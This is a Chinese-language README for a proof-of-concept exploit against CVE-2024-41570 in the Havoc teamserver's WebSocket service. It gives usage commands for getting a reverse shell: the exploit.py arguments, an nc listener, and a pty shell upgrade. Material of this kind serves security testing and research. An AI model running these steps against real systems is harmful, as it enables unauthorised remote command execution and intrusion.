本项目提供了一个基于 Python 的概念验证(PoC)脚本,用于利用脆弱的 WebSocket 服务。该脚本自动化了代理注册、WebSocket 有效载荷投递以及远程命令执行,以建立反向 Shell。
pip install -r requirements.txt
git clone https://github.com/kit4py/CVE-2024-41570.git
cd CVE-2024-41570
pip install -r requirements.txt
使用必需参数运行脚本:
python3 exploit.py -t <target_url> -i <teamserver_ip> -p <teamserver_port> -U <username> -P <password> -l <listener_ip> -L <listener_port>
-t:WebSocket 服务器的目标 URL。-i:Havoc 团队服务器的 IP 地址。-p:Havoc 团队服务器的端口。-U:WebSocket 认证的用户名。-P:WebSocket 认证的密码。-l:反向 Shell 的监听 IP(你的机器)。-L:反向 Shell 的监听端口(你的机器)。python3 exploit.py -t http://example.com -i 127.0.0.1 -p 40056 -U 'havocuser' -P 'password123' -l 192.168.1.2 -L 4444
nc -lvnp <listener_port>
python -c 'import pty; pty.spawn("/bin/bash")'
export TERM=xterm-256color
stty rows 67 columns 318
该脚本需要以下 Python 库:
requestspycryptodome使用以下命令安装:
pip install -r requirements.txt
本脚本仅供学习目的使用。请确保你拥有对目标系统进行测试的明确授权。滥用此脚本可能违反法律和道德准则。
灵感来源于 Default Havoc Poc
欢迎贡献!请随意复刻本仓库并提交拉取请求。
本项目采用 MIT 许可证。详情请参阅 LICENSE 文件。